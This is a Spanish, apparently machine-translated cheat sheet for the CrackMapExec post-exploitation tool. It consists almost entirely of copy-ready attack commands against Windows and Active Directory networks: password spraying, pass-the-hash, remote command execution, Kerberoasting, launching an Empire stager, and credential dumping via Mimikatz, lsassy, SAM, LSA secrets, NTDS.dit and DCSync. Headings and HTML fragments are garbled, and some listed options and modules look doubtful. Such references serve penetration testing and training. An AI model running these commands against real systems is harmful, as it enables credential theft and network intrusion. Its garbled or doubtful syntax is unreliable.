CrackMapExec Cheat Sheet

"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

CrackMapExec (CME) es una herramienta post-explotación diseñada para pruebas de penetración y operaciones de equipo rojo en entornos Windows/Active Directory. A menudo se describe como un "cuchillo del ejército suizo" para las pruebas de penetración de la red, permitiendo la enumeración, las pruebas credenciales y la ejecución de comandos en varios protocolos.

NOVEDAD Advertencia: CrackMapExec es una herramienta de pruebas de seguridad que sólo debe utilizarse en entornos donde tiene permiso explícito para hacerlo.

Instalación

Utilizando pipx (Recomendado)

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

En Kali Linux

sudo apt update
sudo apt install -y crackmapexec

De GitHub

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install

Usando Docker

docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Uso básico

Sintaxis general

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Protocolos respaldados

• smb: Bloque del mensaje del servidor
• winrm: Manejo remoto de Windows
• ldap: Protocolo de acceso al directorio ligero
• mssql: Microsoft SQL Server
• ssh: Secure Shell
• rdp_: Protocolo de escritorio remoto
• ftp_: Protocolo de Transferencia de Archivos

Especificación de objetivos

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Métodos de autenticación

Nombre de usuario y contraseña

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pase el Hash

# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Autenticación local

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Autenticación del dominio

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

SMB Protocol Commands

Enumeración básica

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Ejecución del Mando

# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

Operaciones de archivo

# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'

Mandos de protocolo WinRM

Enumeración básica

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Ejecución del Mando

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

LDAP Protocol Commands

Enumeración básica

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Enumeración avanzada

# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

MSSQL Protocol Commands

Enumeración básica

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Ejecución del Mando

# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Uso del módulo

Gestión del módulo

# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Módulos comunes

Mimikatz

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Imperio

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

PowerView

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

Sangre

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lsassy

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

GOAD

# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad

Técnicas avanzadas

Búsqueda de contraseña

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10

Cosecha temporal

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Operaciones de base de datos

Inicio de la base de datos

crackmapexec smb 192.168.1.0/24 --database

Ver la base de datos

# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1

Opciones comunes

Option	Description
-h, --help	Show help message and exit
-t THREADS	Set number of concurrent threads (default: 100)
--timeout TIMEOUT	Set timeout for connections (default: 5 seconds)
--verbose	Enable verbose output
--debug	Enable debug output
--continue-on-success	Continue authentication attempts even after success
--no-bruteforce	No bruteforce, only use provided credentials
--fail-limit LIMIT	Number of failed login attempts before giving up on a host
--jitter JITTER	Add random delay between authentication attempts (in seconds)
--local-auth	Authenticate using local accounts instead of domain
-d, --domain DOMAIN	Domain to authenticate to
--no-output	Do not display output
--output-file FILE	Write output to file
--log	Enable logging to file (default: ~/.cme/logs/)

Opciones específicas del Protocolo

Opciones SMB

Option	Description
--shares	List available shares
--sessions	List active sessions
--disks	List disks
--loggedon-users	List logged-on users
--users	List domain users
--groups	List domain groups
--local-groups	List local groups
--pass-pol	Get password policy
--rid-brute [MAX_RID]	Enumerate users by bruteforcing RID
--sam	Dump SAM hashes
--lsa	Dump LSA secrets
--ntds	Dump NTDS.dit
--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\}	Method to execute commands

Opciones de LDAP

Option	Description
--users	List domain users
--groups	List domain groups
--computers	List domain computers
--domain	Get domain information
--pass-pol	Get password policy
--trusts	Get domain trusts
--asreproast [OUTFILE]	Get AS-REP roastable users
--kerberoasting [OUTFILE]	Get kerberoastable users
--trusted-for-delegation	Get users/computers with unconstrained delegation
--allowed-to-delegate	Get users/computers with constrained delegation

Opciones de WinRM

Option	Description
--port [PORT]	WinRM port (default: 5985)
--ssl	Use SSL for WinRM

Opciones MSSQL

Option	Description
--port [PORT]	MSSQL port (default: 1433)
-q QUERY	Execute SQL query

Recursos

• Repositorio oficial de GitHub
• CrackMapExec Wiki
• CrackMapExec Guía de instalación
• CrackMapExec Documentación del módulo